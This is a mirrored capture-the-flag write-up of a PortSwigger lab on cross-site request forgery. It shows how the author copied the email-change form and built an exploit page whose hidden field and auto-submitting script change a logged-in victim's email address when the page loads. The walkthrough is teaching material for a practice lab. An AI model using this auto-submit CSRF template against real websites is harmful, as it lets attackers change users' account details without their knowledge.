mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-22 12:03:03 +00:00
36 lines
1.5 KiB
Markdown
36 lines
1.5 KiB
Markdown
|
# Portswigger CSRF Lab - 1
|
||
|
|
||
|
## CSRF vulnerability with no defenses
|
||
|
In this lab we have to perfrom CSRF (Cross Site Request Forgery) which allows a user to make unintentional requests like changing user's email address which is the objective of this lab
|
||
|
|
||
|
<img src="https://i.imgur.com/YmaHQoB.png"/>
|
||
|
|
||
|
We are given credentials to log into our account
|
||
|
|
||
|
<img src="https://i.imgur.com/6qHauWq.png"/>
|
||
|
|
||
|
We can update the email address from this page but this isn't the way we have to update it
|
||
|
|
||
|
<img src="https://i.imgur.com/A1papzn.png"/>
|
||
|
|
||
|
If we look at the source code we can see the html for this form
|
||
|
|
||
|
<img src="https://i.imgur.com/IXAAA6q.png"/>
|
||
|
|
||
|
We have `Go to exploit ` server (I don't have it now since I have solved this lab) , so going to that we will have options like `store` , `exploit` ,`deliver exploit` and `access logs` so first we need to craf a csrf exploit for that we need to copy the same html form content and in `action` paramter we add the url with `/my-account/change-email`
|
||
|
|
||
|
```html
|
||
|
<html>
|
||
|
<body>
|
||
|
<form action="https://ac771fae1eadea59c0730ef5005c00f2.web-security-academy.net/my-account/change-email" method="POST">
|
||
|
<input required type="hidden" name="email" value="ez@swigger.com">
|
||
|
</form>
|
||
|
<script>
|
||
|
document.forms[0].submit();
|
||
|
</script>
|
||
|
</body>
|
||
|
</html>
|
||
|
```
|
||
|
|
||
|
It's not necessary to make the input hidden but real csrf attacks like this where you don't see any input when you click a link and something happens in the back , so this request will make the email changed to ez@swigger.com and with this we completed this lab
|